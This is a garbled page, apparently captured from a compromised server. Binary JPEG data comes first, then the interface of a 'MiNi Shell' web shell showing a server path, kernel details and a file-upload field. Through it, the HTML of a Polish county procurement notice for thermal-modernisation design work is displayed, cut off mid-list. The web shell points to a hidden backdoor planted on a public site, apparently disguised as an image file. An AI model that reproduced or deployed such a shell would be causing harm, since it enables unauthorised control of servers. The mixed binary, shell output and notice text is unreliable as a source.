JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250523/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250523/0024446501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wyk. kompl. dok. projekt. wraz z pełn. nadzoru autorskiego dla zadania inwest. pn. „Termomodernizacja budynków jedn. org. Powiatu (ZSP w Iłży, ZS w Pionkach, DPS-y w Jedlance i Wierzbicy) – etap I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Radomski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223110</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Mazowieckiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 3655801</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@spradom.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spradom.finn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyk. kompl. dok. projekt. wraz z pełn. nadzoru autorskiego dla zadania inwest. pn. „Termomodernizacja budynków jedn. org. Powiatu (ZSP w Iłży, ZS w Pionkach, DPS-y w Jedlance i Wierzbicy) – etap I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-df4402c1-e970-4a27-b985-ffabb5ec89a3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00244465</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00043690/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wykonanie dokumentacji projektowej dotyczącej realizacji zadania pn. Termomodernizacja budynków jednostek organizacyjnych Powiatu Radomskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się za pośrednictwem Platformy zakupowej znajdującej się pod adresem: https://powiatradomski. <br/>ezamawiajacy.pl/servlet/HomeServlet<br/>Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Sposób sporządzania oraz sposób przekazywania oferty, oświadczenia, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Instrukcji korzystania dla Wykonawców. Instrukcja jest udostępniona na platformie Marketplanet OnePlace.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia oferty lub wniosku oraz do<br/>komunikacji wynosi 100 MB. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na platformę Marketplanet OnePlace.<br/>oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem platformy Marketplanet OnePlace w zakładce Korespondencja z Wykonawcami.<br/>W postępowaniu o udzielenie zamówienia ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>a) administratorem Pani/Pana danych osobowych jest Starostwo Powiatowe w Radomiu reprezentowane przez Starostę z siedzibą w Radomiu przy ul. T. Mazowieckiego 7, tel. (48) 36-55-801, adres e-mail: powiat@radompowiat.pl<br/>b) dane kontaktowe do Inspektora Ochrony Danych: Beata Kiełbania-Kubik - Starostwo Powiatowe w Radomiu, ul. T. Mazowieckiego 7, 26-600 Radom, pok. 124, tel. (48) 36-55-801 wew. 181; (48) 340-40-64 wew. 181, e-mail: bkubik@spradom.eu;<br/>c) Pani/Pana dane osobowe przetwarzane będą w celu realizacji ustawowych zadań urzędu - na podstawie art. 6 ust. 1 lit. b, c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r. oraz na podstawie Art. 9 ust 2 lit a ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r.;<br/>d) odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa w tym m.in. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (t. j. Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”;<br/>e) Pani/Pana dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z instrukcją kancelaryjną;<br/>f) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo do żądania od administratora dostępu do danych osobowych<br/>- na podstawie art. 16 RODO prawo do ich sprostowania*<br/>- na podstawie art.18 RODO prawo do ograniczenia przetwarzania prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>g) ma Pani/Pan prawo wniesienia skargi do organu nadzorczego ( tj. Prezesa Urzędu Ochrony Danych Osobowych);<br/>h) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym<br/>z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/>w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego. Zamawiający dodatkowo informuje, że:<br/>Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ON.272.100.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - ZSP w Iłży, ul. Błazińska 5, 27 - 100 Iłża<br/>Termomodernizacja Zespołu Szkół Ponadpodstawowych w Iłży – ul. Błazińska 5,<br/>27-100 Iłża:<br/>􀀀 Ocieplenie ścian zewnętrznych budynku 8 cm warstwą styropianu o współczynniku 􀀀 max 0,033 W/mK. Do wykonania 1207,57 m2 ocieplenia ścian.<br/>􀀀 Ocieplenie ścian piwnic w gruncie 12 cm warstwą styroduru o współczynniku 􀀀 max 0,035 W/mK. Do wykonania 182,20<br/>m2 ocieplenia ścian.<br/>􀀀 Ocieplenie stropodachu sali gimnastycznej 16 cm warstwą styropapy<br/>o współczynniku 􀀀 max 0,038 W/mK metodą wyłożenia od góry. Do wykonania 347,25 m2 ocieplenia.<br/>􀀀 Wymiana okien na okna plastikowe o współczynniku przenikania ciepła nie wyższym niż 0,9 W/m2K. Do wymiany 333,30 m2 okien.<br/>􀀀 Modernizacja systemu podgrzewu c.w.u. polegająca na montażu powietrznej pompy ciepła o mocy ok. 8 kW.<br/>􀀀 Regulacja systemu grzewczego.<br/>􀀀 Montaż na dachu budynku paneli fotowoltaicznych. Moc pojedynczego panelu ok. 400 W. Ogółem zainstalowanych<br/>powinno zostać ok. 60 paneli.<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 1 do SWZ – załącznik 1a dla części 1 oraz projekcie Umowy załącznik nr 2 do SWZ i dokumentacji pomocniczej (audyty energetyczne) – załącznik nr 10 ( dla cz. 1-<br/>10a) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert określonych w<br/>SWZ.<br/>2. Zamawiający będzie oceniał oferty, które nie zostały odrzucone, według następujących kryteriów dla każdej części:<br/>Nr Nazwa kryterium Waga/Znaczenie<br/>1 Cena [C] 60 pkt<br/>2 Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia 40 pkt<br/>3. Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska najwyższą ocenę punktową.<br/>4. Dla zastosowanych kryteriów oceny ofert Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do dwóch miejsc po przecinku) w oparciu o następujący wzór:<br/>Dla każdej części<br/>4.1. Cena [C]<br/>Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego<br/>wzoru (liczba punktów możliwych do uzyskania – 60 pkt.<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium „Cena”<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych<br/>Cb - cena oferty badanej.<br/>4.2 Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ocena w zakresie kryterium „Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia” będzie dokonywana na podstawie ilości<br/>punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 40 pkt).<br/>W ramach kryterium czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia ocenie podlegać będzie deklarowany czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia liczony od dnia przekazania zgłoszenia. Wykonawca zobowiązany jest określić czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z poniższych<br/>okresów.<br/>Lp. czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ilość punktów<br/>1 dzień kalendarzowy - 40<br/>2 dni kalendarzowe - 35<br/>3 dni kalendarzowe - 30<br/>4 dni kalendarzowe - 25<br/>5 dni kalendarzowe - 20<br/>6 dni kalendarzowych - 15<br/>7 dni kalendarzowych - 10<br/>8 dni kalendarzowych i powyżej - 0<br/>UWAGA!<br/>Wykonawca określi czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z powyższych okresów. W przypadku, gdy Wykonawca nie zaoferuje żadnego czasu reakcji na zgłoszenia dotyczące przedmiotu zamówienia lub zadeklaruje czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia powyżej 7 dni kalendarzowych Zamawiający przyjmie, iż zaoferował minimalny tj. 8 dni kalendarzowych i przyjmie wartość – 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - ZS w Pionkach, ul. Aleje Lipowe 23, 26-670 Pionki Termomodernizacja Zespołu Szkół w Pionkach – ul. Aleje Lipowe 23, 26-670 Pionki:<br/>􀀀 Ocieplenie ścian zewnętrznych budynku 10 cm warstwą styropianu o współczynniku 􀀀 max 0,033 W/mK. Do wykonania 1237,71 m2 ocieplenia ścian.<br/>􀀀 Ocieplenie stropu poddasza 22 cm warstwą wełny mineralnej o współczynniku 􀀀 max 0,038 W/mK metodą wyłożenia. Do wykonania 677,70 m2 ocieplenia.<br/>􀀀 Wymiana okien na okna plastikowe o współczynniku przenikania ciepła<br/>nie wyższym niż 0,9 W/m2K. Do wymiany 290,99 m2 okien.<br/>􀀀 Wymiana drzwi zewnętrznych na drzwi aluminiowe o współczynniku przenikania ciepła nie wyższym niż 1,3 W/m2K. Do<br/>wymiany 8,28 m2 drzwi.<br/>􀀀 Całkowita wymiana systemu grzewczego obejmująca wymianę instalacji i kotłowni. Do wymiany 110 sztuk grzejników. Do montażu kocioł gazowy kondensacyjny o mocy 100 kW.<br/>Do wspomagania zasilania nowo zamontowanego oświetlenia zaleca się montaż na dachu budynku paneli fotowoltaicznych.<br/>Moc pojedynczego panelu ok. 330 W.<br/>Ogółem zainstalowanych zostanie 30 paneli.<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 1 do SWZ - załącznik 1b dla części 2 oraz projekcie Umowy załącznik nr 2 do SWZ i dokumentacji pomocniczej (audyty energetyczne) – załącznik nr 10 (dla cz. 2-<br/>10b) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71200000-0 - Usługi architektoniczne i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert określonych w<br/>SWZ.<br/>2. Zamawiający będzie oceniał oferty, które nie zostały odrzucone, według następujących kryteriów dla każdej części:<br/>Nr Nazwa kryterium Waga/Znaczenie<br/>1 Cena [C] 60 pkt<br/>2 Czas reakcji na zgłoszenie dotyczące przedmiotu zamówienia 40 pkt<br/>3. Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska najwyższą ocenę punktową.<br/>4. Dla zastosowanych kryteriów oceny ofert Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do dwóch miejsc po<br/>przecinku) w oparciu o następujący wzór:<br/>4.1. Cena [C]<br/>Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego<br/>wzoru (liczba punktów możliwych do uzyskania – 60 pkt.<br/>C = (Cn / Cb) x 100<br/>gdzie:<br/>C - ilość punktów za kryterium „Cena”<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych<br/>Cb - cena oferty badanej.<br/>4.2 Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ocena w zakresie kryterium „Czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia” będzie dokonywana na podstawie ilości<br/>punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 40 pkt).<br/>W ramach kryterium czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia ocenie podlegać będzie deklarowany czas reakcji<br/>na zgłoszenie dotyczące przedmiotu zamówienia liczony od dnia przekazania zgłoszenia.<br/>Wykonawca zobowiązany jest określić czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia w jednym z poniższych okresów.<br/>Lp. czas reakcji na zgłoszenia dotyczące przedmiotu zamówienia<br/>Ilość punktów<br/>1 dzień kalendarzowy - 40<br/>2 dni kalendarzowe - 35<br/>3 dni kalendarzowe - 30<br/>4 dni kalendarzowe - 25<br/>5 dni kalendarzowe - 